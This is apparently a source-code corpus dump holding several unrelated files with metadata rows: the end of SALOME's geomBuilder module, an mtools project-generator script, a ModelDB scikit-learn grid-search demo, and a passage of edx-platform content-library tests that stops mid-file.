"Returns values of the field step"
return self.getStep(step).GetValues()
## Changes values of the field step
def setValues(self, step, values):
"Changes values of the field step"
stp = self.getStep(step)
errBeg = "Field.setValues(values) : Error: "
try:
ok = stp.SetValues( values )
except Exception, e:
excStr = str(e)
if excStr.find("WrongPythonType") > 0:
raise RuntimeError, errBeg +\
"wrong type of values, %s values are expected"%str(self.getTypeEnum())[4:]
raise RuntimeError, errBeg + str(e)
if not ok:
nbOK = self.field.GetArraySize(self)
nbKO = len(values)
if nbOK != nbKO:
raise RuntimeError, errBeg + "len(values) must be %s but not %s"%(nbOK,nbKO)
else:
raise RuntimeError, errBeg + "failed"
return
pass # end of class geomField
# Register the new proxy for GEOM_Field
omniORB.registerObjref(GEOM._objref_GEOM_Field._NP_RepositoryId, geomField)
## Create a new geomBuilder instance.The geomBuilder class provides the Python
# interface to GEOM operations.
#
# Typical use is:
# \code
# import salome
# salome.salome_init()
# from salome.geom import geomBuilder
# geompy = geomBuilder.New(salome.myStudy)
# \endcode
# @param study SALOME study, generally obtained by salome.myStudy.
# @param instance CORBA proxy of GEOM Engine. If None, the default Engine is used.
# @return geomBuilder instance
def New( study, instance=None):
"""
Create a new geomBuilder instance.The geomBuilder class provides the Python
interface to GEOM operations.
Typical use is:
import salome
salome.salome_init()
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
Parameters:
study SALOME study, generally obtained by salome.myStudy.
instance CORBA proxy of GEOM Engine. If None, the default Engine is used.
Returns:
geomBuilder instance
"""
#print "New geomBuilder ", study, instance
global engine
global geom
global doLcc
engine = instance
if engine is None:
doLcc = True
geom = geomBuilder()
assert isinstance(geom,geomBuilder), "Geom engine class is %s but should be geomBuilder.geomBuilder. Import geomBuilder before creating the instance."%geom.__class__
geom.init_geom(study)
return geom
# Register methods from the plug-ins in the geomBuilder class
plugins_var = os.environ.get( "GEOM_PluginsList" )
plugins = None
if plugins_var is not None:
plugins = plugins_var.split( ":" )
plugins=filter(lambda x: len(x)>0, plugins)
if plugins is not None:
for pluginName in plugins:
pluginBuilderName = pluginName + "Builder"
try:
exec( "from salome.%s.%s import *" % (pluginName, pluginBuilderName))
except Exception, e:
from salome_utils import verbose
print "Exception while loading %s: %s" % ( pluginBuilderName, e )
continue
exec( "from salome.%s import %s" % (pluginName, pluginBuilderName))
plugin = eval( pluginBuilderName )
# add methods from plugin module to the geomBuilder class
for k in dir( plugin ):
if k[0] == '_': continue
method = getattr( plugin, k )
if type( method ).__name__ == 'function':
if not hasattr( geomBuilder, k ):
setattr( geomBuilder, k, method )
pass
pass
del pluginName
pass
pass
| lgpl-2.1 | -8,497,507,476,621,121,000 | 48.652687 | 169 | 0.597899 | false |
vindar/mtools | tools/mtools-project.py | 1 | 8519 | #!/usr/bin/env python
#
# Copyright 2015 Arvind Singh
# This file is part of the mtools library.
#
# mtools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mtools If not, see <http://www.gnu.org/licenses/>.
############################################################################
# #
# script: create an empty mtools project. #
# #
############################################################################
################### main.cpp ####################
mainFile = r"""/***********************************************
* project: [PROJECT_NAME_PLH]
* date: [PROJECT_DATE_PLH]
***********************************************/
#include "mtools/mtools.hpp"
int main(int argc, char *argv[])
{
MTOOLS_SWAP_THREADS(argc,argv); // required on OSX, does nothing on Linux/Windows
mtools::parseCommandLine(argc,argv,true); // parse the command line, interactive mode
mtools::cout << "Hello World\n";
mtools::cout.getKey();
return 0;
}
/* end of file main.cpp */
"""
################### CMakeLists.txt ####################
cmakeFile = r"""################################################
# CMakeLists for project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
#
# generated by mtools-project.py
################################################
cmake_minimum_required(VERSION 3.10.1)
if( WIN32 )
# look for vcpkg on windows
if (DEFINED ENV{VCPKG_DIR})
string(REPLACE "\\" "/" _vcpkg_dir "$ENV{VCPKG_DIR}")
else ()
find_file( _vcpkg_exe "vcpkg.exe" PATHS ENV PATH)
if (_vcpkg_exe)
get_filename_component(_vcpkg_dir ${_vcpkg_exe} DIRECTORY)
endif()
endif()
if (_vcpkg_dir)
set(CMAKE_TOOLCHAIN_FILE "${_vcpkg_dir}/scripts/buildsystems/vcpkg.cmake")
message(STATUS "Windows: vcpkg found at [${_vcpkg_dir}]")
else()
message(STATUS "Windows: vcpkg not found.")
endif()
# only Debug and Release configurations
SET(CMAKE_CONFIGURATION_TYPES "Debug;Release;RelWithDebInfo" CACHE STRING "" FORCE)
endif()
# use the same compilers as that used for compiling mtools
set(CMAKE_CXX_COMPILER "${MTOOLS_CXX_COMPILER}" CACHE STRING "" FORCE)
set(CMAKE_C_COMPILER "${MTOOLS_C_COMPILER}" CACHE STRING "" FORCE)
project([PROJECT_NAME_PLH])
# release is the default build type
if (NOT CMAKE_BUILD_TYPE)
set(CMAKE_BUILD_TYPE Release)
endif ()
# add the project main directory as a possible location for findXXX.cmake scripts.
set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${PROJECT_SOURCE_DIR})
find_package(mtools REQUIRED)
######### external dependencies #########
# (look also for FindXXX.cmake in the project dir.)
# for exemple
# find_package(GUROBI REQUIRED)
#########################################
file(GLOB project_SRC "*.cpp" "*.hpp" "*.h")
add_executable("${PROJECT_NAME}" ${project_SRC})
target_link_libraries("${PROJECT_NAME}" PUBLIC mtools)
# compile options
if(WIN32)
set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_CXX_EXTENSIONS OFF)
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /DMTOOLS_DEBUG_FLAG")
# hack for RelWithDebINfo configuration otherwise compile never ends on MSVC
set(CMAKE_CXX_FLAGS_RELWITHDEBINFO "/Zi /Gm- /Ox /Ob0 /DMTOOLS_DEBUG_FLAG")
else()
target_compile_options("${PROJECT_NAME}" PUBLIC "-std=c++17")
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} -DMTOOLS_DEBUG_FLAG -Wall")
set(CMAKE_CXX_FLAGS_RELWITHDEBINFO "${CMAKE_CXX_FLAGS_RELWITHDEBINFO} -DMTOOLS_DEBUG_FLAG -Wall")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -Wall")
endif()
######### external dependencies #########
# add here other dependencies such as:
# find_package(GSL)
# target_link_libraries("${PROJECT_NAME}" PUBLIC GSL::gsl)
#########################################
# set the project as the default startup project in visual studio.
set_property(DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR} PROPERTY VS_STARTUP_PROJECT "${PROJECT_NAME}")
# move CMake specific project inside filter "CMakePredefinedTargets".
set_property(GLOBAL PROPERTY USE_FOLDERS ON)
set(PREDEFINED_TARGETS_FOLDER "CustomTargets")
message(STATUS "")
message(STATUS "")
if (NOT WIN32)
message(STATUS "Project ${PROJECT_NAME} created for make with configuration ${CMAKE_BUILD_TYPE}")
message(STATUS " - Debug : [${CMAKE_CXX_FLAGS_DEBUG}]")
message(STATUS " - RelWithDebInfo : [${CMAKE_CXX_FLAGS_RELWITHDEBINFO}]")
message(STATUS " - Release : [${CMAKE_CXX_FLAGS_RELEASE}]")
else()
message(STATUS "Project ${PROJECT_NAME} created for MSVC with configurations")
message(STATUS " - Debug : [${CMAKE_CXX_FLAGS_DEBUG}]")
message(STATUS " - RelWithDebInfo : [${CMAKE_CXX_FLAGS_RELWITHDEBINFO}]")
message(STATUS " - Release : [${CMAKE_CXX_FLAGS_RELEASE}]")
endif()
message(STATUS "")
message(STATUS "")
#end of file
"""
################### clean_build.py ####################
cleanbuildFile = r"""#!/usr/bin/env python
#
# project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
# script that cleans the /build sub-directory
#
import shutil
import os
#import time
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
if (os.path.isdir("build")):
shutil.rmtree('build')
# time.sleep(1)
os.makedirs('build')
with open('build/build_directory','w') as out:
out.write('This directory (will) contain the CMake generated project files.')
"""
################### run_cmake.py ####################
runcmakeFile = r"""#!/usr/bin/env python
#
# project: [PROJECT_NAME_PLH]
# date: [PROJECT_DATE_PLH]
# Invoque cmake to build the project.
# usage: ./run_cmake [CMAKE_OPTIONS...]
#
import sys
import os
import subprocess
carg = sys.argv
del carg[0]
carg.insert(0,'cmake');
carg.append('..');
# on windows, we build x64 binaries
if sys.platform.startswith('win32'):
carg.insert(1,'-A');
carg.insert(2,'x64');
# invoque cmake with the correct arguments
if (not os.path.exists('build')):
os.makedirs('build')
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname + "/build")
subprocess.call(carg)
"""
############################################################################
# the python script
import os
import shutil
import sys
import datetime
import subprocess
# Python 2 and 3:
from builtins import input
myinput = input
# display an error msg
def error(msg):
print("*** ERROR ***")
print(msg)
raw_input("Press Enter to continue...")
sys.exit(0)
# make replacement in string then save the file
def repl(str,filename):
str = str.replace("[PROJECT_NAME_PLH]",project_name)
str = str.replace("[PROJECT_DATE_PLH]",project_date)
filepath = project_dir + "/" + filename
try:
fout = open(filepath,"w")
fout.write(str);
fout.close()
except:
error("cannot write file [" + filepath + "]")
# get the date
project_date = str(datetime.date.today())
# get the project name
if (len(sys.argv) > 1):
project_name = sys.argv[1]
else:
project_name = myinput("Name of the project to create ? ")
# create the project directory
project_dir = os.getcwd() + "/" + project_name
project_build = project_dir + "/build"
if os.path.exists(project_dir):
error("directory [" + project_dir + "] already exist")
try:
os.makedirs(project_dir)
except:
error("cannot create project directory [" + project_dir + "]")
# copy the files
repl(mainFile,"main.cpp")
repl(cmakeFile,"CMakeLists.txt")
repl(runcmakeFile,"run_cmake.py")
repl(cleanbuildFile,"clean_build.py")
os.chdir(project_dir)
os.system("python clean_build.py")
# uncomment below to run cmake right way.
#os.system("python run_cmake.py")
print("\n*** Project " + project_name + " created ! ***")
if sys.platform.startswith('win32'):
myinput("Press Enter to continue...")
# end of script mtools-project.py
############################################################################
| gpl-3.0 | -2,650,942,873,968,966,000 | 25.538941 | 98 | 0.620965 | false |
mitdbg/modeldb | client/workflows/examples-without-verta/scripts/client-demo.py | 1 | 3496 | """Logistic Regression with Grid Search (scikit-learn)"""
import os, sys
import itertools
import joblib
import pandas as pd
import numpy as np
from sklearn import model_selection
from sklearn import linear_model
from sklearn import metrics
sys.path.append(os.path.join("..", "modeldb"))
from modeldbclient import ModelDBClient
import warnings
warnings.filterwarnings('ignore')
# Logging Workflow
# instantiate client
client = ModelDBClient()
proj = client.set_project("Test Project")
expt = client.set_experiment("Test Experiment")
# load pre-cleaned data from CSV file into pandas DataFrame
data_path = os.path.join("..", "data", "census", "cleaned-census-data.csv")
df = pd.read_csv(data_path, delimiter=',')
# split into features and labels
features_df = df.drop('>50K', axis='columns')
labels_df = df['>50K'] # we are predicting whether an individual's income exceeds $50k/yr
# extract NumPy arrays from DataFrames
X = features_df.values
y = labels_df.values
# split data into training, validation, and testing sets
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.20, shuffle=False)
X_train, X_val, y_train, y_val = model_selection.train_test_split(X_train, y_train, test_size=0.20, shuffle=False)
# define hyperparameters
hyperparam_candidates = {
'C': [1e-1, 1, 1e1],
'solver': ['lbfgs'],
'max_iter': [1e3, 1e4, 1e5],
}
hyperparam_sets = [dict(zip(hyperparam_candidates.keys(), values))
for values
in itertools.product(*hyperparam_candidates.values())]
# grid search through hyperparameters
for hyperparam_num, hyperparams in enumerate(hyperparam_sets):
# create object to track experiment run
run = client.set_experiment_run(f"run {hyperparam_num}")
# log hyperparameters
for key, val in hyperparams.items():
run.log_hyperparameter(key, val)
print(hyperparams, end=' ')
# log data
run.log_dataset("data", data_path)
# create and train model
model = linear_model.LogisticRegression(**hyperparams)
model.fit(X_train, y_train)
# calculate and log validation accuracy
val_acc = model.score(X_val, y_val)
run.log_metric("validation accuracy", val_acc)
print(f"Validation accuracy: {val_acc}")
# save and log model
model_path = os.path.join("..", "output", "client-demo", f"logreg_gridsearch_{hyperparam_num}.gz")
joblib.dump(model, model_path)
run.log_model(model_path)
# close client
client.disconnect()
# fetch existing project, experiment, and experiment runs
client = ModelDBClient()
proj = client.set_project("Test Project")
expt = client.set_experiment("Test Experiment")
client.set_experiment_runs()
# fetch best experiment run based on validation accuracy
best_run = sorted(client.expt_runs, key=lambda expt_run: expt_run.get_metrics()['validation accuracy'])[-1]
# fetch that run's hyperparameters and validation accuracy
best_hyperparams = best_run.get_hyperparameters()
best_val_acc = best_run.get_metrics()['validation accuracy']
print("Best Validation Round:")
print(f"{best_hyperparams} Validation accuracy: {best_val_acc}")
# retrain model using best set of hyperparameters
model = linear_model.LogisticRegression(**best_hyperparams)
model.fit(np.concatenate((X_train, X_val), axis=0), np.concatenate((y_train, y_val)))
print(f"Training accuracy: {model.score(X_train, y_train)}")
print(f"Testing accuracy: {model.score(X_test, y_test)}")
# close client
client.disconnect()
| mit | 3,824,065,516,834,919,000 | 28.880342 | 114 | 0.716819 | false |
stvstnfrd/edx-platform | cms/djangoapps/contentstore/tests/test_libraries.py | 1 | 45058 | """
Content library unit tests that require the CMS runtime.
"""
import ddt
import six
from django.test.utils import override_settings
from mock import Mock, patch
from opaque_keys.edx.locator import CourseKey, LibraryLocator
from six.moves import range
from cms.djangoapps.contentstore.tests.utils import AjaxEnabledTestClient, parse_json
from cms.djangoapps.contentstore.utils import reverse_library_url, reverse_url, reverse_usage_url
from cms.djangoapps.contentstore.views.item import _duplicate_item
from cms.djangoapps.contentstore.views.preview import _load_preview_module
from cms.djangoapps.contentstore.views.tests.test_library import LIBRARY_REST_URL
from cms.djangoapps.course_creators.views import add_user_with_status_granted
from common.djangoapps.student import auth
from common.djangoapps.student.auth import has_studio_read_access, has_studio_write_access
from common.djangoapps.student.roles import (
CourseInstructorRole,
CourseStaffRole,
LibraryUserRole,
OrgInstructorRole,
OrgLibraryUserRole,
OrgStaffRole
)
from common.djangoapps.student.tests.factories import UserFactory
from common.djangoapps.xblock_django.user_service import DjangoXBlockUserService
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.x_module import STUDIO_VIEW
class LibraryTestCase(ModuleStoreTestCase):
"""
Common functionality for content libraries tests
"""
def setUp(self):
super(LibraryTestCase, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.user = UserFactory(password=self.user_password, is_staff=True)
self.client = AjaxEnabledTestClient()
self._login_as_staff_user(logout_first=False)
self.lib_key = self._create_library()
self.library = modulestore().get_library(self.lib_key)
self.session_data = {} # Used by _bind_module
def _login_as_staff_user(self, logout_first=True):
""" Login as a staff user """
if logout_first:
self.client.logout()
self.client.login(username=self.user.username, password=self.user_password)
def _create_library(self, org="org", library="lib", display_name="Test Library"):
"""
Helper method used to create a library. Uses the REST API.
"""
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': org,
'library': library,
'display_name': display_name,
})
self.assertEqual(response.status_code, 200)
lib_info = parse_json(response)
lib_key = CourseKey.from_string(lib_info['library_key'])
self.assertIsInstance(lib_key, LibraryLocator)
return lib_key
def _add_library_content_block(self, course, library_key, publish_item=False, other_settings=None):
"""
Helper method to add a LibraryContent block to a course.
The block will be configured to select content from the library
specified by library_key.
other_settings can be a dict of Scope.settings fields to set on the block.
"""
return ItemFactory.create(
category='library_content',
parent_location=course.location,
user_id=self.user.id,
publish_item=publish_item,
source_library_id=six.text_type(library_key),
**(other_settings or {})
)
def _add_simple_content_block(self):
""" Adds simple HTML block to library """
return ItemFactory.create(
category="html", parent_location=self.library.location,
user_id=self.user.id, publish_item=False
)
def _refresh_children(self, lib_content_block, status_code_expected=200):
"""
Helper method: Uses the REST API to call the 'refresh_children' handler
of a LibraryContent block
"""
if 'user' not in lib_content_block.runtime._services: # pylint: disable=protected-access
user_service = DjangoXBlockUserService(self.user)
lib_content_block.runtime._services['user'] = user_service # pylint: disable=protected-access
handler_url = reverse_usage_url(
'component_handler',
lib_content_block.location,
kwargs={'handler': 'refresh_children'}
)
response = self.client.ajax_post(handler_url)
self.assertEqual(response.status_code, status_code_expected)
return modulestore().get_item(lib_content_block.location)
def _bind_module(self, descriptor, user=None):
"""
Helper to use the CMS's module system so we can access student-specific fields.
"""
if user is None:
user = self.user
if user not in self.session_data:
self.session_data[user] = {}
request = Mock(user=user, session=self.session_data[user])
_load_preview_module(request, descriptor)
def _update_item(self, usage_key, metadata):
"""
Helper method: Uses the REST API to update the fields of an XBlock.
This will result in the XBlock's editor_saved() method being called.
"""
update_url = reverse_usage_url("xblock_handler", usage_key)
return self.client.ajax_post(
update_url,
data={
'metadata': metadata,
}
)
def _list_libraries(self):
"""
Use the REST API to get a list of libraries visible to the current user.
"""
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 200)
return parse_json(response)
@ddt.ddt
class TestLibraries(LibraryTestCase):
"""
High-level tests for libraries
"""
@ddt.data(
(2, 1, 1),
(2, 2, 2),
(2, 20, 2),
)
@ddt.unpack
def test_max_items(self, num_to_create, num_to_select, num_expected):
"""
Test the 'max_count' property of LibraryContent blocks.
"""
for _ in range(num_to_create):
self._add_simple_content_block()
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
lc_block = self._add_library_content_block(course, self.lib_key, other_settings={'max_count': num_to_select})
self.assertEqual(len(lc_block.children), 0)
lc_block = self._refresh_children(lc_block)
# Now, we want to make sure that .children has the total # of potential
# children, and that get_child_descriptors() returns the actual children
# chosen for a given student.
# In order to be able to call get_child_descriptors(), we must first
# call bind_for_student:
self._bind_module(lc_block)
self.assertEqual(len(lc_block.children), num_to_create)
self.assertEqual(len(lc_block.get_child_descriptors()), num_expected)
def test_consistent_children(self):
"""
Test that the same student will always see the same selected child block
"""
# Create many blocks in the library and add them to a course:
for num in range(8):
ItemFactory.create(
data=u"This is #{}".format(num + 1),
category="html", parent_location=self.library.location, user_id=self.user.id, publish_item=False
)
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
lc_block = self._add_library_content_block(course, self.lib_key, {'max_count': 1})
lc_block_key = lc_block.location
lc_block = self._refresh_children(lc_block)
def get_child_of_lc_block(block):
"""
Fetch the child shown to the current user.
"""
children = block.get_child_descriptors()
self.assertEqual(len(children), 1)
return children[0]
# Check which child a student will see:
self._bind_module(lc_block)
chosen_child = get_child_of_lc_block(lc_block)
chosen_child_defn_id = chosen_child.definition_locator.definition_id
lc_block.save()
modulestore().update_item(lc_block, self.user.id)
# Now re-load the block and try again:
def check():
"""
Confirm that chosen_child is still the child seen by the test student
"""
for _ in range(6): # Repeat many times b/c blocks are randomized
lc_block = modulestore().get_item(lc_block_key) # Reload block from the database
self._bind_module(lc_block)
current_child = get_child_of_lc_block(lc_block)
self.assertEqual(current_child.location, chosen_child.location)
self.assertEqual(current_child.data, chosen_child.data)
self.assertEqual(current_child.definition_locator.definition_id, chosen_child_defn_id)
check()
# Refresh the children:
lc_block = self._refresh_children(lc_block)
# Now re-load the block and try yet again, in case refreshing the children changed anything:
check()
def test_definition_shared_with_library(self):
"""
Test that the same block definition is used for the library and course[s]
"""
block1 = self._add_simple_content_block()
def_id1 = block1.definition_locator.definition_id
block2 = self._add_simple_content_block()
def_id2 = block2.definition_locator.definition_id
self.assertNotEqual(def_id1, def_id2)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
for child_key in lc_block.children:
child = modulestore().get_item(child_key)
def_id = child.definition_locator.definition_id
self.assertIn(def_id, (def_id1, def_id2))
def test_fields(self):
"""
Test that blocks used from a library have the same field values as
defined by the library author.
"""
data_value = "A Scope.content value"
name_value = "A Scope.settings value"
lib_block = ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name_value,
data=data_value,
)
self.assertEqual(lib_block.data, data_value)
self.assertEqual(lib_block.display_name, name_value)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
course_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(course_block.data, data_value)
self.assertEqual(course_block.display_name, name_value)
def test_block_with_children(self):
"""
Test that blocks used from a library can have children.
"""
data_value = "A Scope.content value"
name_value = "A Scope.settings value"
# In the library, create a vertical block with a child:
vert_block = ItemFactory.create(
category="vertical",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
)
child_block = ItemFactory.create(
category="html",
parent_location=vert_block.location,
user_id=self.user.id,
publish_item=False,
display_name=name_value,
data=data_value,
)
self.assertEqual(child_block.data, data_value)
self.assertEqual(child_block.display_name, name_value)
# Next, create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
course_vert_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(len(course_vert_block.children), 1)
course_child_block = modulestore().get_item(course_vert_block.children[0])
self.assertEqual(course_child_block.data, data_value)
self.assertEqual(course_child_block.display_name, name_value)
def test_change_after_first_sync(self):
"""
Check that nothing goes wrong if we (A) Set up a LibraryContent block
and use it successfully, then (B) Give it an invalid configuration.
No children should be deleted until the configuration is fixed.
"""
# Add a block to the library:
data_value = "Hello world!"
ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name="HTML BLock",
data=data_value,
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": "library-v1:NOT+FOUND"},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1) # Children should not be deleted due to a bad setting.
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.data, data_value)
def test_refreshes_children_if_libraries_change(self):
""" Tests that children are automatically refreshed if libraries list changes """
library2key = self._create_library("org2", "lib2", "Library2")
library2 = modulestore().get_library(library2key)
data1, data2 = "Hello world!", "Hello other world!"
ItemFactory.create(
category="html",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name="Lib1: HTML BLock",
data=data1,
)
ItemFactory.create(
category="html",
parent_location=library2.location,
user_id=self.user.id,
publish_item=False,
display_name="Lib 2: HTML BLock",
data=data2,
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 1)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": str(library2key)},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.data, data2)
@patch("xmodule.library_tools.SearchEngine.get_search_engine", Mock(return_value=None, autospec=True))
def test_refreshes_children_if_capa_type_change(self):
""" Tests that children are automatically refreshed if capa type field changes """
name1, name2 = "Option Problem", "Multiple Choice Problem"
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name1,
data="<problem><optionresponse></optionresponse></problem>",
)
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
display_name=name2,
data="<problem><multiplechoiceresponse></multiplechoiceresponse></problem>",
)
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 2)
resp = self._update_item(
lc_block.location,
{"capa_type": 'optionresponse'},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.display_name, name1)
resp = self._update_item(
lc_block.location,
{"capa_type": 'multiplechoiceresponse'},
)
self.assertEqual(resp.status_code, 200)
lc_block = modulestore().get_item(lc_block.location)
self.assertEqual(len(lc_block.children), 1)
html_block = modulestore().get_item(lc_block.children[0])
self.assertEqual(html_block.display_name, name2)
def test_refresh_fails_for_unknown_library(self):
""" Tests that refresh children fails if unknown library is configured """
# Create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
# Add a LibraryContent block to the course:
lc_block = self._add_library_content_block(course, self.lib_key)
lc_block = self._refresh_children(lc_block)
self.assertEqual(len(lc_block.children), 0)
# Now, change the block settings to have an invalid library key:
resp = self._update_item(
lc_block.location,
{"source_library_id": "library-v1:NOT+FOUND"},
)
self.assertEqual(resp.status_code, 200)
with self.assertRaises(ValueError):
self._refresh_children(lc_block, status_code_expected=400)
def test_library_filters(self):
"""
Test the filters in the list libraries API
"""
self._create_library(library="test-lib1", display_name="Foo", org='org')
self._create_library(library="test-lib2", display_name="Library-Title-2", org='org-test1')
self._create_library(library="l3", display_name="Library-Title-3", org='org-test1')
self._create_library(library="l4", display_name="Library-Title-4", org='org-test2')
self.assertEqual(len(self.client.get_json(LIBRARY_REST_URL).json()), 5) # 1 more from self.setUp()
self.assertEqual(len(self.client.get_json('{}?org=org-test1'.format(LIBRARY_REST_URL)).json()), 2)
self.assertEqual(len(self.client.get_json('{}?text_search=test-lib'.format(LIBRARY_REST_URL)).json()), 2)
self.assertEqual(len(self.client.get_json('{}?text_search=library-title'.format(LIBRARY_REST_URL)).json()), 3)
self.assertEqual(len(self.client.get_json('{}?text_search=library-'.format(LIBRARY_REST_URL)).json()), 3)
self.assertEqual(len(self.client.get_json('{}?text_search=org-test'.format(LIBRARY_REST_URL)).json()), 3)
@ddt.ddt
@patch('django.conf.settings.SEARCH_ENGINE', None)
class TestLibraryAccess(LibraryTestCase):
"""
Test Roles and Permissions related to Content Libraries
"""
def setUp(self):
""" Create a library, staff user, and non-staff user """
super(TestLibraryAccess, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.non_staff_user_password = 'foo'
self.non_staff_user = UserFactory(password=self.non_staff_user_password, is_staff=False)
def _login_as_non_staff_user(self, logout_first=True):
""" Login as a user that starts out with no roles/permissions granted. """
if logout_first:
self.client.logout() # We start logged in as a staff user
self.client.login(username=self.non_staff_user.username, password=self.non_staff_user_password)
def _assert_cannot_create_library(self, org="org", library="libfail", expected_code=403):
""" Ensure the current user is not able to create a library. """
self.assertGreaterEqual(expected_code, 300)
response = self.client.ajax_post(
LIBRARY_REST_URL,
{'org': org, 'library': library, 'display_name': "Irrelevant"}
)
self.assertEqual(response.status_code, expected_code)
key = LibraryLocator(org=org, library=library)
self.assertEqual(modulestore().get_library(key), None)
def _can_access_library(self, library):
"""
Use the normal studio library URL to check if we have access
`library` can be a LibraryLocator or the library's root XBlock
"""
if isinstance(library, (six.string_types, LibraryLocator)):
lib_key = library
else:
lib_key = library.location.library_key
response = self.client.get(reverse_library_url('library_handler', six.text_type(lib_key)))
self.assertIn(response.status_code, (200, 302, 403))
return response.status_code == 200
def tearDown(self):
"""
Log out when done each test
"""
self.client.logout()
super(TestLibraryAccess, self).tearDown() # lint-amnesty, pylint: disable=super-with-arguments
def test_creation(self):
"""
The user that creates a library should have instructor (admin) and staff permissions
"""
# self.library has been auto-created by the staff user.
self.assertTrue(has_studio_write_access(self.user, self.lib_key))
self.assertTrue(has_studio_read_access(self.user, self.lib_key))
# Make sure the user was actually assigned the instructor role and not just using is_staff superpowers:
self.assertTrue(CourseInstructorRole(self.lib_key).has_user(self.user))
# Now log out and ensure we are forbidden from creating a library:
self.client.logout()
self._assert_cannot_create_library(expected_code=302) # 302 redirect to login expected
# Now check that logged-in users without CourseCreator role cannot create libraries
self._login_as_non_staff_user(logout_first=False)
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True}):
self._assert_cannot_create_library(expected_code=403) # 403 user is not CourseCreator
# Now check that logged-in users with CourseCreator role can create libraries
add_user_with_status_granted(self.user, self.non_staff_user)
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True}):
lib_key2 = self._create_library(library="lib2", display_name="Test Library 2")
library2 = modulestore().get_library(lib_key2)
self.assertIsNotNone(library2)
@ddt.data(
CourseInstructorRole,
CourseStaffRole,
LibraryUserRole,
)
def test_acccess(self, access_role):
"""
Test the various roles that allow viewing libraries are working correctly.
"""
# At this point, one library exists, created by the currently-logged-in staff user.
# Create another library as staff:
library2_key = self._create_library(library="lib2")
# Login as non_staff_user:
self._login_as_non_staff_user()
# non_staff_user shouldn't be able to access any libraries:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 0)
